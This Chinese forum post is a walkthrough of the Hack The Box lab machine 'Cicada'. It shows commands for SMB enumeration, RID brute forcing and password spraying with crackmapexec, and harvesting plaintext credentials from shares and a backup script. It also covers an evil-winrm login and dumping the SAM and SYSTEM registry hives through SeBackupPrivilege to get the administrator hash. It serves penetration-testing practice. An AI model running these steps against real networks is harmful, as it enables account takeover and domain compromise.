HTB打靶记载-Cicada

锦通  金牌会员 | 2024-10-15 16:41:08 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题
楼主

主题 671|帖子 671|积分 2013

Nmap Scan

nmap扫描一下ip
nmap -sT -sV -O -Pn 10.10.11.35
  1. Nmap scan report for 10.10.11.35
  2. Host is up (0.012s latency).
  3. Not shown: 989 filtered tcp ports (no-response), 1 filtered tcp ports (host-unreach)
  4. PORT    STATE SERVICE       VERSION
  5. 25/tcp  open  smtp?
  6. 53/tcp  open  domain        Simple DNS Plus
  7. 88/tcp  open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-14 16:35:48Z)
  8. 110/tcp open  pop3?
  9. 135/tcp open  msrpc         Microsoft Windows RPC
  10. 139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
  11. 389/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
  12. 445/tcp open  microsoft-ds?
  13. 464/tcp open  kpasswd5?
  14. 593/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
  15. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  16. Device type: general purpose|specialized
  17. Running: Microsoft Windows XP|7|2012, VMware Player
  18. OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012 cpe:/a:vmware:player
  19. OS details: Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012, VMware Player virtual NAT device
  20. Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
  22. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  23. Nmap done: 1 IP address (1 host up) scanned in 406.91 seconds
复制代码
smb测试

开放445端口,smbclient连一下
smbclient -L //10.10.11.35

免密登录查看一下HR文件夹
smbclient -N //10.10.11.35/HR

将"Notice from HR.txt"下载下来
  1. Dear new hire!
  3. Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
  5. Your default password is: Cicada$M6Corpb*@Lp#nZp!8
  7. To change your password:
  9. 1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
  10. 2. Once logged in, navigate to your account settings or profile settings section.
  11. 3. Look for the option to change your password. This will be labeled as "Change Password".
  12. 4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
  13. 5. After changing your password, make sure to save your changes.
  15. Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
  17. If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
  19. Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
  21. Best regards,
  22. Cicada Corp
复制代码
得到一个暗码:Cicada$M6Corpb*@Lp#nZp!8
Rid爆破

通过使用默认账户guest爆破rid来探测存在的用户名,这里过滤一下用户
crackmapexec smb 10.10.11.35 -u "guest" -p "" --rid-brute|grep "SidTypeUser"
  1. sarah.dantelia
  2. michael.wrightson
  3. david.orelious
  4. emily.oscars
复制代码
爆破一下用户
crackmapexec smb 10.10.11.35 -u user.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'

得到用户暗码: michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
enum4linux-ng扫描

使用enum4linux-ng搜集所有与smb服务有关的信息
enum4linux-ng -A -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' 10.10.11.35 -t 10

得到用户暗码: david.orelious:aRt$Lp#7t*VQ!3
连接DEV文件夹
smbclient //10.10.11.35/DEV -U 'david.orelious'

下载Backup_script.ps1
  1. $sourceDirectory = "C:\smb"
  2. $destinationDirectory = "D:\Backup"
  4. $username = "emily.oscars"
  5. $password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
  6. $credentials = New-Object System.Management.Automation.PSCredential($username, $password)
  7. $dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
  8. $backupFileName = "smb_backup_$dateStamp.zip"
  9. $backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
  10. Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
  11. Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
复制代码
用户暗码:emily.oscars!3@Lp#M6b*7t*Vt
winrm登录

evil-winrm -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -i 10.10.11.35

whoami /all发现开启了SeBackupPrivilege,emily.oscars属于Backup Operators组,说明可以从注册表导出文件,在temp目录下导出sam文件(卡成儿子了
  1. reg save hklm\sam sam.hive
  2. reg save hklm\system system.hive
  5. download sam.hive
  6. download system.hive
复制代码
卡了半天都没下下来,总之下下来,secretsdumps.py解密拿到administrator的hash,再用evil-winrm登录拿到root.txt

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览
返回列表

快速回复

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

锦通

金牌会员
这个人很懒什么都没写!

楼主热帖

标签云

挺好的 服务器
微信订阅号
微信服务号
微信客服
小程序
H5
关于我们 商务合作 网站地图
©Copyright 2022-2024 杭州祥升科技有限公司 版权所有 浙ICP备20004199号
快速回复 返回顶部 返回列表